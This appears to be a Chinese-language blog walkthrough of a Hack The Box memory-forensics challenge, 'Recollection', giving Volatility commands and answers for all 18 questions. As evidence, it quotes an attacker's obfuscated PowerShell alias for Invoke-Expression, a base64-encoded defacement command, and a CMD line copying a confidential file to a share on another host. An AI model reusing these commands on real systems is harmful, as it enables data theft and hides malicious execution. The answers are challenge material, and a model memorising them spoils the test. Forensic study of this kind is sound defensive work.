Recollection

task1-2

1
vol.py -f recollection.bin imageinfo

image-20240330120753603

task1操作系统是什么? windows 7

task2内存转储是什么时候创建的?2022-12-19 16:07:30

task3

题目:攻击者获得计算机的访问权限后,将混淆的 PowerShell 命令复制到剪贴板。命令是什么?

1
vol.py -f recollection.bin --profile=Win7SP1x64 clipboard

image-20240330121447087

答案:(gv ‘MDR‘).naMe[3,11,2]-joIN’’

Task 4-8

Task 4 题目:攻击者复制了混淆后的命令,将其用作 PowerShell cmdlet 的别名。cmdlet 名称是什么?

Task 5 题目:执行了 CMD 命令来尝试窃取文件。完整的命令行是什么?

Task 6 题目:按照上面的命令,现在告诉我们文件是否已成功泄露?

Task 7 题目:攻击者试图创建自述文件。文件的完整路径是什么?

Task 8 题目:机器的主机名是什么?

1
2
vol.py -f recollection.bin --profile=Win7SP1x64 consoles > consoles.txt	# 写入文件方便查看
cat consoles.txt|grep PS 	# 查看通过 powershell 执行的命令

image-20240330234804258

通过文件里面得到内容可以得到向192.168.0.171这个主机发送了Confidential.txt文件,执行了一个用base64编码的命令,执行了混淆代码,在download文件夹内执行了一个程序,执行net users

查看Confidential.txt并发送到其他主机

但path错误

image-20240330235453441

用 powershell 执行了一串 base64 编码后的命令

image-20240330235649369

可以用以下代码查看解码后的内容

1
2
3
cat consoles.txt|grep '\-e' -A 1
# 解码
echo 'ZWNobyAiaGFja2VkIGJ5IG1hZmlhIiA+ICJDOlxVc2Vyc1xQdWJsaWNcT2ZmaWNlXHJlYWRtZS50eHQi'|base64 -d

image-20240330235954746

执行混淆代码

先把大小写混淆的代码还原(gv '*MDR*').name[3,11,2]-join''

在本地执行过代码发现iex,相当于eval函数

执行net users

image-20240331003903725

答案4-8

  • Invoke-Expression
  • type C:\Users\Public\Secret\Confidential.txt > \192.168.0.171\pulice\pass.txt
  • No
  • C:\Users\Public\Office\readme.txt
  • USER-PC

Task 9

有多少个用户

1
vol.py -f recollection.bin --profile=Win7SP1x64 printkey  -K "SAM\Domains\Account\Users\Names"

image-20240331005515283

可以发现有四个用户,但有一个是隐藏所以只有三个用户

答案:3

Task 10

题目:在“\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge”文件夹中有一些子文件夹,其中有一个名为passwords.txt的文件。完整的文件位置/路径是什么?

1
2
vol.py -f recollection.bin --profile=Win7SP1x64 filescan > filescan.txt
cat filescan.txt |grep 'passwords.txt'

image-20240331011452947

答案:\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt

Task 11

题目:使用命令执行了恶意可执行文件。可执行 EXE 文件的名称是其本身的哈希值。哈希值是多少?

1
cat consoles.txt|grep '\.\\.*exe'

image-20240331012213022

答案:b0ad704122d9cffddd57ec92991a1e99fc1ac02d5b4d8fd31720978c02635cb1

Task 12

题目:继上一个问题之后,您在上面找到的恶意文件的 Imphash 是什么?

1
cat filescan.txt|grep b0ad704122d9cffddd57ec92991a1e99fc1ac02d5b4d8fd31720978c02635cb1.exe

把文件的hash值https://www.virustotal.com/gui/home/search网站上面进行搜索

image-20240331013705308

答案:d3b592cd9481e4f053b5362e22d61595

Task 13

题目:在上一个问题之后,请以UTC格式告诉我们创建恶意文件的日期?

同上在下面可以发现一个创建时间

image-20240331013959955

答案:2022-06-22 11:49:04

Task 14

题目:机器的本地 IP 地址是什么?

1
vol.py -f recollection.bin --profile=Win7SP1x64 netscan > netscan.txt

仔细查看Local Address列

答案:192.168.0.104

Task 15

题目:有多个 PowerShell 进程,其中一个进程是子进程。哪个进程是它的父进程?

1
vol.py -f recollection.bin --profile=Win7SP1x64 pstree >pstree.txt

image-20240331015020373

答案:cmd.exe

Task 16

题目:攻击者可能使用电子邮件地址登录社交媒体。你能告诉我们电子邮件地址吗?

1
strings -el recollection.bin | grep -E '@(.*?)com$'

image-20240331015641111

发现有很多的邮箱,结合Tesk 7的hacked by mafia,可以发现正确的邮箱是mafia_code1337@gmail.com

答案:mafia_code1337@gmail.com

Task 17

题目:使用 MS Edge 浏览器,受害者搜索了 SIEM 解决方案。SIEM 解决方案的名称是什么?

1
2
3
cat filescan.txt |grep -i history 
vol.py --profile=Win7SP1x64 -f recollection.bin dumpfiles -Q 0x000000011e0d16f0 -D ./
open file.None.0xfffffa80056d1440.dat

image-20240331020952555

查看keyword_search_thems表中的数据

答案:

wazuh

Task 18

题目:受害用户下载了 exe 文件。该文件的名称模仿了带有拼写错误的Microsoft的合法二进制文件(即合法的二进制文件powershell.exe,攻击者将恶意软件命名为powershall.exe)。告诉我们文件扩展名的文件名?

1
cat filescan.txt |grep -i 'downloads' |grep exe

image-20240331021312665

答案:csrsss.exe

#HTB
Recollection
https://www.mrdang.icu/2024/03/30/Recollection/
作者
Mr.Dang
发布于
2024年3月30日
许可协议